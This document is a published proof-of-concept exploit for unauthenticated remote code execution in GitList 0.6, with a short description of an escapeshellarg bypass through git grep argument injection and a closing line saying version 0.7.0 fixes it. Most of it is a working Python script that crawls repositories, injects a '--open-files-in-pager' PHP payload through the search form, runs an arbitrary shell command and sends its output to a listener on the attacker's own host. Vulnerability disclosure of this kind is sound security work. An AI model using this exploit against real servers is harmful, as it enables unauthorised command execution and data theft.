GitList 0.6 - Unauthenticated Remote Code Execution
Source: https://security.szurek.pl/  Author: Szurek  Published: 2018-04-27
'''
# Exploit Title: GitList 0.6 Unauthenticated RCE
# Date: 25-04-2018
# Software Link: https://github.com/klaussilveira/gitlist
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
  
1. Description
 
Bypass/Exploit `escapeshellarg` using argument injection: `git grep --open-files-in-pager=whoami`.
 
More info about this technique:
 
https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
 
2. Proof of Concept
'''
 
import requests
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import urlparse
import urllib
import threading
import time
import os
import re
 
url = 'http://192.168.1.1/gitlist/'
command = 'id'
your_ip = '192.168.1.100'
your_port = 8001
 
print "GitList 0.6 Unauthenticated RCE"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
 
print "REMEMBER TO DISABLE FIREWALL"
 
search_url = None
r = requests.get(url)
repos = re.findall(r'/([^/]+)/master/rss', r.text)
 
if len(repos) == 0:
    print "[-] No repos"
    os._exit(0)
 
for repo in repos:
    print "[+] Found repo {}".format(repo)
    r = requests.get("{}{}".format(url, repo))
    files = re.findall(r'href="[^\"]+blob/master/([^\"]+)"', r.text)
    for file in files:
        r = requests.get("{}{}/raw/master/{}".format(url, repo, file))
        print "[+] Found file {}".format(file)
        print r.text[0:100]
        search_url = "{}{}/tree/{}/search".format(url, repo, r.text[0:1])      
        break
 
if not search_url:
    print "[-] No files in repo"
    os._exit(0)
 
print "[+] Search using {}".format(search_url)
 
class GetHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        parsed_path = urlparse.urlparse(self.path)
        print "[+] Command response"
        print urllib.unquote_plus(parsed_path.query).decode('utf8')[2:]
        self.send_response(200)
        self.end_headers()
        self.wfile.write("OK")
        os._exit(0)
 
    def log_message(self, format, *args):
        return
 
def exploit_server():
    server = HTTPServer((your_ip, your_port), GetHandler)
    server.serve_forever()
 
print "[+] Start server on {}:{}".format(your_ip, your_port)
t = threading.Thread(target=exploit_server)
t.daemon = True
t.start()
print "[+] Server started"
 
r  = requests.post(search_url, data={'query':'--open-files-in-pager=php -r "file_get_contents(\\"http://{}:{}/?a=\\".urlencode(shell_exec(\\"{}\\")));"'.format(your_ip, your_port, command)})
 
while True:
    time.sleep(1)
 
'''
3. Solution:
 
Update to version 0.7.0
 
https://github.com/klaussilveira/gitlist/releases/tag/0.7.0
'''
 